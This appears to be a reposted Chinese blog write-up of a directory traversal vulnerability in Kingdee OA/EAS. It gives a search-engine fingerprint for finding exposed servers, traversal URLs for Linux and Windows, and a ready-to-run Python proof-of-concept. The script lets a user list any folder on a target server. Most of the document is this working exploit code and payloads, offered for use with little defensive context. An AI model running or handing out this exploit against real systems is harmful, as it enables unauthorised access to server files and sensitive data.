漏洞描述
金蝶OA server_file 存在目录遍历漏洞,可目录遍历可以获取服务器敏感信息
神秘代码
app="Kingdee-EAS"
漏洞 Payload
# linux/appmonitor/protected/selector/server_file/files?folder=/&suffix=# windows/appmonitor/protected/selector/server_file/files?folder=C://&suffix=
漏洞复现
验证Poc
import requestsimport jsonimport optparse# app="Kingdee-EAS"parser = optparse.OptionParser()parser.add_option("-u","--url",dest="urls",action="store",help="Base target uri (ex. http://target-uri/)")options, args = parser.parse_args()url_Kingdee = options.urlsdef poc():check = requests.get(url_Kingdee).status_codeif check ==200:flag = Trueprint("[+] Success connect to target")try:headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'}while flag:cmd = input("$ ")if cmd == 'exit':exit()payload = '/appmonitor/protected/selector/server_file/files?folder='+cmd+'&suffix='rep = requests.get(url_Kingdee+payload,headers=headers,verify=False)format = json.loads(rep.text)dict_json = format['rows']for t in dict_json:print(t['path'])except:exit()poc()
验证 Poc 没有对服务器进行分辨 Windows 与 Linux,(主要有点懒),大佬们可以自行补充下缺省部分,写的太菜,轻喷。
谢谢观看
十载求学纵苦三伏三九无悔无怨,朝成就再忆全心全力有苦有乐
——致2021高考学子
文章转载自Redus,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
